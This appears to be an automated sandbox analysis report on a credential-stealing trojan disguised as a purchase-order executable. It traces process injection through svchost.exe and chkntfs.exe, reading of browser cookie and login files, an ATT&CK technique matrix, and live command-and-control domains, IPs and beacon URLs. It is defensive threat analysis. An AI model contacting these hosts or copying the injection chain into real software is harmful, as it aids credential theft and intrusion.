            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\PO_987654345678.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe protection: read write
            Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe Thread register set: target process: 8040
            Source: C:\Windows\SysWOW64\chkntfs.exe Thread APC queued: target process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
            Source: C:\Users\user\Desktop\PO_987654345678.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 234008
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F61201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00F61201
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F42BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F42BA5
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F6B226 SendInput,keybd_event, 0_2_00F6B226
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00F822DA
            Source: C:\Users\user\Desktop\PO_987654345678.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO_987654345678.exe"
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F60B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00F60B62
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F61663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00F61663
            Source: PO_987654345678.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: PO_987654345678.exe, ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F20698 cpuid 0_2_00F20698
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F78195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00F78195
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F5D27A GetUserNameW, 0_2_00F5D27A
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F3BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00F3BB6F
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F042DE

            Stealing of Sensitive Information

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\chkntfs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\chkntfs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: PO_987654345678.exe Binary or memory string: WIN_81
            Source: PO_987654345678.exe Binary or memory string: WIN_XP
            Source: PO_987654345678.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PO_987654345678.exe Binary or memory string: WIN_XPe
            Source: PO_987654345678.exe Binary or memory string: WIN_VISTA
            Source: PO_987654345678.exe Binary or memory string: WIN_7
            Source: PO_987654345678.exe Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F81204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00F81204
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F81806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00F81806
            MITRE ATT&CK matrix (techniques listed per tactic; a leading number is the count shown for that technique in the report):

            Reconnaissance
            • Gather Victim Identity Information
            • Credentials
            • Email Addresses
            • Employee Names
            • Gather Victim Network Information
            • Domain Properties
            • DNS
            • Network Trust Dependencies
            • Network Topology

            Resource Development
            • Acquire Infrastructure
            • Domains
            • DNS Server
            • Virtual Private Server
            • Server
            • Botnet
            • Web Services
            • Serverless
            • Malvertising

            Initial Access
            • 2 Valid Accounts
            • Default Accounts
            • Domain Accounts
            • Local Accounts
            • Cloud Accounts
            • Replication Through Removable Media
            • External Remote Services
            • Drive-by Compromise
            • Exploit Public-Facing Application

            Execution
            • 1 Native API
            • Scheduled Task/Job
            • At
            • Cron
            • Launchd
            • Scheduled Task
            • Systemd Timers
            • Container Orchestration Job
            • Command and Scripting Interpreter

            Persistence
            • 1 DLL Side-Loading
            • 2 Valid Accounts
            • Logon Script (Windows)
            • Login Hook
            • Network Logon Script
            • RC Scripts
            • Startup Items
            • Scheduled Task/Job
            • At

            Privilege Escalation
            • 1 Exploitation for Privilege Escalation
            • 1 Abuse Elevation Control Mechanism
            • 1 DLL Side-Loading
            • 2 Valid Accounts
            • 21 Access Token Manipulation
            • 412 Process Injection
            • Startup Items
            • Scheduled Task/Job
            • At

            Defense Evasion
            • 1 Disable or Modify Tools
            • 1 Deobfuscate/Decode Files or Information
            • 1 Abuse Elevation Control Mechanism
            • 3 Obfuscated Files or Information
            • 1 DLL Side-Loading
            • 2 Valid Accounts
            • 12 Virtualization/Sandbox Evasion
            • 21 Access Token Manipulation
            • 412 Process Injection

            Credential Access
            • 1 OS Credential Dumping
            • 21 Input Capture
            • Security Account Manager
            • NTDS
            • LSA Secrets
            • Cached Domain Credentials
            • DCSync
            • Proc Filesystem
            • /etc/passwd and /etc/shadow

            Discovery
            • 2 System Time Discovery
            • 1 Account Discovery
            • 2 File and Directory Discovery
            • 116 System Information Discovery
            • 241 Security Software Discovery
            • 12 Virtualization/Sandbox Evasion
            • 3 Process Discovery
            • 11 Application Window Discovery
            • 1 System Owner/User Discovery

            Lateral Movement
            • Remote Services
            • Remote Desktop Protocol
            • SMB/Windows Admin Shares
            • Distributed Component Object Model
            • SSH
            • VNC
            • Windows Remote Management
            • Cloud Services
            • Direct Cloud VM Connections

            Collection
            • 1 Archive Collected Data
            • 1 Data from Local System
            • 1 Email Collection
            • 21 Input Capture
            • 3 Clipboard Data
            • GUI Input Capture
            • Web Portal Capture
            • Credential API Hooking
            • Data Staged

            Command and Control
            • 4 Ingress Tool Transfer
            • 1 Encrypted Channel
            • 4 Non-Application Layer Protocol
            • 4 Application Layer Protocol
            • Fallback Channels
            • Multiband Communication
            • Commonly Used Port
            • Application Layer Protocol
            • Web Protocols

            Exfiltration
            • Exfiltration Over Other Network Medium
            • Exfiltration Over Bluetooth
            • Automated Exfiltration
            • Traffic Duplication
            • Scheduled Transfer
            • Data Transfer Size Limits
            • Exfiltration Over C2 Channel
            • Exfiltration Over Alternative Protocol
            • Exfiltration Over Symmetric Encrypted Non-C2 Protocol

            Impact
            • 1 System Shutdown/Reboot
            • Network Denial of Service
            • Data Encrypted for Impact
            • Data Destruction
            • Data Encrypted for Impact
            • Service Stop
            • Inhibit System Recovery
            • Defacement
            • Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1503298; Sample: PO_987654345678.exe; Startdate: 03/09/2024; Architecture: WINDOWS; Score: 100

            Graph-level network: www.golbasi-nakliyat.xyz; www.asian-massage-us.xyz (Performs DNS queries to domains with low reputation); 20 other IPs or domains
            Graph-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures

            Process tree:
            • PO_987654345678.exe (badge: 4), started. Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
            • svchost.exe, started by PO_987654345678.exe. Signatures: Maps a DLL or memory area into another process
            • ftfqgrfncDSuar.exe, injected by svchost.exe. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            • chkntfs.exe (badge: 13), started by ftfqgrfncDSuar.exe. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
            • ftfqgrfncDSuar.exe, injected by chkntfs.exe. Signatures: Found direct / indirect Syscall (likely to bypass EDR). Network: www.dfbio.net 218.247.68.184, ports 65007, 65008, 65009, WEST263GO-HKWest263InternationalLimitedHK, China; www.fineg.online 162.0.239.141, ports 64987, 64988, 64989, NAMECHEAP-NETUS, Canada; 9 other IPs or domains
            • firefox.exe, started by chkntfs.exe

                        Source | Detection | Scanner | Label | Link
                        PO_987654345678.exe | 37% | Virustotal | | Browse
                        PO_987654345678.exe | 42% | ReversingLabs | Win32.Trojan.Strab |
                        PO_987654345678.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        aflaksokna.com | 0% | Virustotal | | Browse
                        d55dg.top | 0% | Virustotal | | Browse
                        www.healthsolutions.top | 1% | Virustotal | | Browse
                        www.asian-massage-us.xyz | 1% | Virustotal | | Browse
                        omexai.info | 0% | Virustotal | | Browse
                        natroredirect.natrocdn.com | 0% | Virustotal | | Browse
                        www.d55dg.top | 1% | Virustotal | | Browse
                        www.esistiliya.online | 0% | Virustotal | | Browse
                        www.arlon-commerce.com | 0% | Virustotal | | Browse
                        www.950021.com | 0% | Virustotal | | Browse
                        www.begumnasreenbano.com | 0% | Virustotal | | Browse
                        www.omexai.info | 0% | Virustotal | | Browse
                        www.myim.cloud | 0% | Virustotal | | Browse
                        www.aflaksokna.com | 0% | Virustotal | | Browse
                        206.23.85.13.in-addr.arpa | 1% | Virustotal | | Browse
                        Source | Detection | Scanner | Label | Link
                        https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
                        https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
                        https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
                        https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
                        http://www.d55dg.top/ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= | 0% | Avira URL Cloud | safe |
                        http://www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www.aflaksokna.com/ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www.healthsolutions.top/cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs= | 0% | Avira URL Cloud | safe |
                        http://www.golbasi-nakliyat.xyz/gxi9/ | 0% | Avira URL Cloud | safe |
                        http://www.aflaksokna.com/ifo8/ | 0% | Avira URL Cloud | safe |
                        http://www.dfbio.net/yzen/ | 0% | Avira URL Cloud | safe |
                        http://www.healthsolutions.top/cent/ | 0% | Avira URL Cloud | safe |
                        http://www.asian-massage-us.xyz/kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www70.clientebradesco.online/ | 0% | Avira URL Cloud | safe |
                        http://www.asian-massage-us.xyz/kc69/ | 0% | Avira URL Cloud | safe |
                        https://www.google.com | 0% | Avira URL Cloud | safe |
                        http://www.myim.cloud/12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www.begumnasreenbano.com | 0% | Avira URL Cloud | safe |
                        http://www70.clientebradesco.online/ | 3% | Virustotal | | Browse
                        http://www.begumnasreenbano.com/ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www.asian-massage-us.xyz/kc69/ | 1% | Virustotal | | Browse
                        http://www.fineg.online/mkan/ | 0% | Avira URL Cloud | safe |
                        https://www.google.com | 0% | Virustotal | | Browse
                        http://www.myim.cloud/12ts/ | 0% | Avira URL Cloud | safe |
                        http://www.clientebradesco.online/xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= | 0% | Avira URL Cloud | safe |
                        http://www.begumnasreenbano.com | 0% | Virustotal | | Browse
                        http://www.golbasi-nakliyat.xyz/gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www.begumnasreenbano.com/ibl4/ | 0% | Avira URL Cloud | safe |
                        http://www.myim.cloud/12ts/ | 1% | Virustotal | | Browse
                        http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL | 0% | Avira URL Cloud | safe |
                        http://www.d55dg.top/ftud/ | 0% | Avira URL Cloud | safe |
                        http://www.omexai.info/45sz/ | 0% | Avira URL Cloud | safe |
                        http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH | 0% | Avira URL Cloud | safe |
                        http://www.dfbio.net:80/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvu | 0% | Avira URL Cloud | safe |
                        http://www.dfbio.net/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8 | 0% | Avira URL Cloud | safe |
                        http://www.qiluqiyuan.buzz/p6o9/ | 0% | Avira URL Cloud | safe |
                        http://www.d55dg.top/ftud/ | 1% | Virustotal | | Browse
                        http://www.qiluqiyuan.buzz/p6o9/ | 1% | Virustotal | | Browse
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        www.clientebradesco.online | 198.58.118.167 | true | false | | unknown
                        aflaksokna.com | 5.144.130.52 | true | true | | unknown
                        d55dg.top | 154.23.184.240 | true | true | | unknown
                        www.healthsolutions.top | 13.248.169.48 | true | true | | unknown
                        www.asian-massage-us.xyz | 199.59.243.226 | true | true | | unknown
                        www.qiluqiyuan.buzz | 161.97.168.245 | true | true | | unknown
                        www.dfbio.net | 218.247.68.184 | true | true | | unknown
                        www.fineg.online | 162.0.239.141 | true | true | | unknown
                        omexai.info | 3.33.130.190 | true | true | | unknown
                        natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
                        www.myim.cloud | 199.59.243.226 | true | true | | unknown
                        www.begumnasreenbano.com | 188.114.97.3 | true | true | | unknown
                        www.golbasi-nakliyat.xyz | unknown | unknown | true | | unknown
                        www.omexai.info | unknown | unknown | true | | unknown
                        www.esistiliya.online | unknown | unknown | true | | unknown
                        www.d55dg.top | unknown | unknown | true | | unknown
                        www.aflaksokna.com | unknown | unknown | true | | unknown
                        www.950021.com | unknown | unknown | true | | unknown
                        www.arlon-commerce.com | unknown | unknown | true | | unknown
                        www.thriveline.online | unknown | unknown | true | | unknown
                        206.23.85.13.in-addr.arpa | unknown | unknown | true | | unknown
                        Name | Malicious | Antivirus Detection | Reputation
                        http://www.aflaksokna.com/ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.d55dg.top/ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= | true | Avira URL Cloud: safe | unknown
